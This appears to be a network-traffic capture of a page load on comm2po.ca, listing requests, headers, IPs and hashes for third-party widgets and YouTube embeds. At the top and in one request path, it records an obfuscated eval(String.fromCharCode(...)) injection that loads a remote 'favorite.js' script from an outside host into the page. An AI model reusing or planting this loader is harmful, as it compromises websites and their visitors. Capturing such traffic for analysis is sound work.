,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
Hash acbaa06e4144eaac4dd869a2b1438679
4c887877de01ffcd9e5515a57646b243cfe62e1e
0394798d86e326ae6d317b9e8859b05e9a1f7ea5aa20e52a12545139db706497
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 404 Not Found
date: Wed, 21 Sep 2022 04:23:41 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 74e006e58f4fb4ff-OSL
X-Firefox-Spdy: h2
app.leadfox.co/service/track/get/
172.67.71.4200 OK 135 B URL HTTP/2 app.leadfox.co/service/track/get/
IP 172.67.71.4:0
File type JSON data\012- , ASCII text, with no line terminators
Hash d9f0292cdfdf72a491ed3b6edf6d3a50
fd67e1caa13414b6f7af7466f60c8c716ca1a403
15702e626537b4bca950e9873e5fb05b654e9742fc319e8d346429f78edf76a0
GET /service/track/get/ HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:42 GMT
content-type: application/json
set-cookie: __lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq; expires=Wed, 18-May-2033 03:33:20 GMT; Max-Age=336265778; path=/; SameSite=None; Secure
access-control-allow-origin: https://www.comm2po.ca
x-kong-upstream-latency: 28
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zS%2Fegz60J8R%2F6JCU9ifOCJFpMpJYN02ghJgAffOdfR%2B3kLWdi%2BlWGnomPfloZ2Dh4y5%2F6NwIWSRFcTT2KqVl8O%2B45RJBE%2BQfjUKvRGicq5qBMsAu5Yy%2FzUw4IyXAaFbd"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006ebfb88b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
rest.leadfox.co/v1/popup/list/5b893d1adc933c222e4466ab/?url=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&__lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq
172.67.71.4200 OK 6 B URL HTTP/2 rest.leadfox.co/v1/popup/list/5b893d1adc933c222e4466ab/?url=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&__lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq
IP 172.67.71.4:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 7f64cc8ba7692dcd42d5a25efe313d08
e05a760455d4b1e5f8d0f125f622f1716bc2bebf
90a814f9e7afea5be03fd1f20955d31092a0e3e81f5b669f224c2162bec3e8eb
GET /v1/popup/list/5b893d1adc933c222e4466ab/?url=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&__lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq HTTP/1.1
Host: rest.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:43 GMT
content-type: application/json; charset=utf-8
access-control-allow-origin: https://www.comm2po.ca
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
access-control-expose-headers: X-Rate-Limit-Limit,X-Rate-Limit-Remaining,X-Rate-Limit-Reset,X-Retry-As
x-rate-limit-limit: 100
x-rate-limit-remaining: 99
x-rate-limit-reset: 1
etag: W/"2-l9Fw4VUO7kr8CvBlt4zaMCqXZ0w"
x-kong-upstream-latency: 7
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZB5iX0hnK0GksSUJm60wdULTsZRhDiDbgogGbmdlvendEpP2zU4yET%2B5QJW282yGFQ1ciqfeeOfZJHGtBzyPJf%2BB%2BH%2FcxIgm7gFmTmTYeeGOyfpYh4DxSx8GUE1GVNFoKg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006f11beab50c-OSL
content-encoding: br
X-Firefox-Spdy: h2
jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
142.250.74.74200 OK 31 kB URL HTTP/2 jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
IP 142.250.74.74:0
File type JSON data\012- , ASCII text, with very long lines (65536), with no line terminators
Hash 688f942932135982771334d6ffa8b251
6793fde38fe29320fbc828b05244fefa36e593a9
464f5b77f6db2a38b32d1d56f5ac869ef526202d27f50b44e2431384fb9f32fe
POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/1.1
Host: jnn-pa.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Goog-Api-Key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
Content-Type: application/json+protobuf
X-User-Agent: grpc-web-javascript/0.1
Content-Length: 24
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/json+protobuf; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:44 GMT
server: ESF
cache-control: private
content-length: 30932
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.youtube-nocookie.com
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash ada29f357ebf16bf037a8f7ca0943687
08a6e41c5fa688ca538b3e4b30ec8100fb292aaf
e368e32c7f8c8d2ae99520c324a2571ed402c80f76aec3c05a9711df12150de5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
i.ytimg.com/vi_webp/GkX0bwjE7pk/maxresdefault.webp
216.58.207.214200 OK 60 kB URL HTTP/2 i.ytimg.com/vi_webp/GkX0bwjE7pk/maxresdefault.webp
IP 216.58.207.214:0
File type RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x720, Scaling: [none]x[none], YUV color, decoders should clamp\012- data
Hash 964569bfb2431c7c09b65a7f057db746
e6af6fb23be3dd48d8733f576144e3e5895c1bb8
ca189c520c8589dd262c282b92da639800ca3205e8355da8477551ae9c9dd148
GET /vi_webp/GkX0bwjE7pk/maxresdefault.webp HTTP/1.1
Host: i.ytimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/webp
vary: Origin
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 59892
date: Wed, 21 Sep 2022 04:23:44 GMT
expires: Wed, 21 Sep 2022 06:23:44 GMT
cache-control: public, max-age=7200
etag: "1552324497"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash ada29f357ebf16bf037a8f7ca0943687
08a6e41c5fa688ca538b3e4b30ec8100fb292aaf
e368e32c7f8c8d2ae99520c324a2571ed402c80f76aec3c05a9711df12150de5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 28 kB IP 142.250.74.3:0
Hash ca0e377cd4845f7c45ba415e05cc80ca
66723dd675a75aaf8054aed87a66608edba3ac2a
836e2a67b80794c9e19952be85fdb8c699a2e712ae140a44c0fbbebb9e084621
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 67801aaa77b0226b24e48c3d2b0055ec
284e0390a9afeed4f556a2e7eac0e75c33b01d6c
b576b0b0307ccf104137b1427b246e30570da6c64a1c8116fe4e765a0562a308
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.google.com/js/th/0Q0sPaTf27KkVV0qBrYI7cmJeSJkpG4CF1zVddAZEjs.js
142.250.74.164200 OK 14 kB URL HTTP/2 www.google.com/js/th/0Q0sPaTf27KkVV0qBrYI7cmJeSJkpG4CF1zVddAZEjs.js
IP 142.250.74.164:0
File type ASCII text, with very long lines (36110)
Hash d348ea7c67cf70cc27add8ec15920c5f
46b2db74425f5c6c10c69831277b83c76c8c24b8
e9198b139add4e4683e04549366c63b57000c4e9d719c0e5820124d63d0fccff
GET /js/th/0Q0sPaTf27KkVV0qBrYI7cmJeSJkpG4CF1zVddAZEjs.js HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="botguard-scs"
report-to: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
content-length: 14308
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 05:09:26 GMT
expires: Thu, 14 Sep 2023 05:09:26 GMT
cache-control: public, max-age=31536000
last-modified: Tue, 13 Sep 2022 11:00:00 GMT
content-type: text/javascript
age: 602058
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
142.250.74.74200 OK 0 B URL HTTP/2 jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
IP 142.250.74.74:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
OPTIONS /$rpc/google.internal.waa.v1.Waa/GenerateIT HTTP/1.1
Host: jnn-pa.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type,x-goog-api-key,x-user-agent
Referer: https://www.youtube-nocookie.com/
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
access-control-allow-origin: https://www.youtube-nocookie.com
vary: origin, referer, x-origin
access-control-allow-methods: DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT
access-control-allow-headers: content-type,x-goog-api-key,x-user-agent
access-control-max-age: 3600
date: Wed, 21 Sep 2022 04:23:44 GMT
content-type: text/html
server: ESF
content-length: 0
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
142.250.74.74200 OK 110 B URL HTTP/2 jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
IP 142.250.74.74:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 6613996d1afbfc5c8b0c178e13e48982
76a22fbef54b8033253709c6a03c245ce321ebd0
5a8d5a6b297919e2427b258f5db3fa1bedf38a686f50b102e628c6e3975a01f6
POST /$rpc/google.internal.waa.v1.Waa/GenerateIT HTTP/1.1
Host: jnn-pa.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Goog-Api-Key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
Content-Type: application/json+protobuf
X-User-Agent: grpc-web-javascript/0.1
Content-Length: 1019
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/json+protobuf; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:44 GMT
server: ESF
cache-control: private
content-length: 110
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.youtube-nocookie.com
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
yt3.ggpht.com/ytc/AMLnZu8WZ6lesBpayHSkCT1f-vYmii1wauL_NQ2urUzi=s68-c-k-c0x00ffffff-no-rj
142.250.74.161200 OK 3.6 kB URL HTTP/2 yt3.ggpht.com/ytc/AMLnZu8WZ6lesBpayHSkCT1f-vYmii1wauL_NQ2urUzi=s68-c-k-c0x00ffffff-no-rj
IP 142.250.74.161:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 68x68, components 3\012- data
Hash 45103532a0dc520bb42ac700f59f50d1
13f9090ff260aa2a7b6580f1f09075493415c585
5deaa83a4f1228d8407e68c359516bfab80f7f3cf90cea29275bc493dde0bfa9
GET /ytc/AMLnZu8WZ6lesBpayHSkCT1f-vYmii1wauL_NQ2urUzi=s68-c-k-c0x00ffffff-no-rj HTTP/1.1
Host: yt3.ggpht.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-expose-headers: Content-Length
etag: "v47"
expires: Thu, 22 Sep 2022 04:23:44 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="unnamed.jpg"
content-type: image/jpeg
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Wed, 21 Sep 2022 04:23:44 GMT
server: fife
content-length: 3571
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 67801aaa77b0226b24e48c3d2b0055ec
284e0390a9afeed4f556a2e7eac0e75c33b01d6c
b576b0b0307ccf104137b1427b246e30570da6c64a1c8116fe4e765a0562a308
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash c81d42d817c63fd387f875fae88f126a
88fa4a4aa864600dfc025c7077d355d38d2d22b9
81ad3d8e554a0fd4530752e92a769bb4689229fb097bb09076bd85c7d3208fe7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash c81d42d817c63fd387f875fae88f126a
88fa4a4aa864600dfc025c7077d355d38d2d22b9
81ad3d8e554a0fd4530752e92a769bb4689229fb097bb09076bd85c7d3208fe7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&sq=0&rn=1&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5